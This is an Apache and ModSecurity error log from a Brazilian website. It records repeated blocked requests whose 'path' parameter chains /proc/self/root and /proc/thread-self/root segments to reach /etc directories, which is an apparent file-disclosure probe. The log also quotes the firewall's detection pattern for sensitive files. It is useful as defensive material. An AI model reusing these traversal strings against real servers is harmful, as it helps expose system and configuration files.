[Wed Mar 18 07:40:48.463138 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:55604] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBMOw_le52K8_3pV2-dQAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:40:49.762607 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:55478] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBMQkwaGbbGflqUZDveQAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:40:58.825769 2026] [mime_magic:error] [pid 19507:tid 140411716749056] (70014)End of file found: [client 57.141.18.42:39394] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:41:10.325152 2026] [mime_magic:error] [pid 29882:tid 140411607643904] (70014)End of file found: [client 57.141.18.113:40012] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:41:11.631031 2026] [:error] [pid 17887:tid 140411574073088] [client 74.7.243.128:55486] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBRwkwaGbbGflqUZDvlwAAANQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:41:14.727441 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:40458] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBStY0UrI5A3LftIx8lwAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:41:21.341356 2026] [:error] [pid 19507:tid 140411691570944] [client 74.7.243.128:40466] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBT9Y0UrI5A3LftIx8owAAAYY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:41:24.138421 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.243.128:57502] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBUwkwaGbbGflqUZDvpwAAAMM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:41:54.455118 2026] [:error] [pid 30077:tid 140411590858496] [client 74.7.241.31:54032] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBcvu8EFLIOrSqIpvkxAAAAlI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:42:01.723026 2026] [mime_magic:error] [pid 11816:tid 140411649607424] (70014)End of file found: [client 216.73.216.191:42962] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:42:17.357978 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:57518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBiew_le52K8_3pV2-2AAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:42:47.008333 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:48134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBptY0UrI5A3LftIx9HgAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:42:50.262835 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.228.61:51670] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqBquyqAr6etmhZHNqbhgAAAEk"]
[Wed Mar 18 07:42:52.755211 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.244.43:55046] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abqBrCmAPhZkrhU8w4lMzwAAAI8"]
[Wed Mar 18 07:43:08.814350 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:36210] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBvCmAPhZkrhU8w4lM5QAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:43:17.254998 2026] [:error] [pid 17887:tid 140411565680384] [client 74.7.243.128:35952] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBxQkwaGbbGflqUZDwKAAAANU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:43:18.775286 2026] [:error] [pid 11816:tid 140411674785536] [client 74.7.243.128:35962] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBxuw_le52K8_3pV2_IwAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:43:20.576222 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:48096] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqByAkwaGbbGflqUZDwLAAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 07:43:21.907802 2026] [:error] [pid 31803:tid 140411540502272] [client 74.7.243.128:48108] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqByeyqAr6etmhZHNqbqAAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:43:26.743068 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:48120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqBzuoXxyEfFpUF8f9OAwAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:43:37.753294 2026] [:error] [pid 19507:tid 140411674785536] [client 74.7.241.31:45890] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqB2NY0UrI5A3LftIx9ZgAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:44:16.960947 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:48134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCAAkwaGbbGflqUZDwdwAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:44:17.400549 2026] [:error] [pid 17887:tid 140411632822016] [client 74.7.243.128:48134] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCAQkwaGbbGflqUZDweAAAAM0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:44:33.920663 2026] [:error] [pid 11816:tid 140411624429312] [client 74.7.243.128:52256] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCEew_le52K8_3pV2_cgAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 07:44:34.147028 2026] [mime_magic:error] [pid 17653:tid 140411590858496] (70014)End of file found: [client 216.73.216.191:51826] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 07:44:35.290888 2026] [:error] [pid 26799:tid 140411590858496] [client 74.7.243.128:57780] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCE9a6ubjKNq_cu4Z3OgAAA1I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 07:45:06.368309 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:57788] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abqCMta6ubjKNq_cu4Z3YgAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
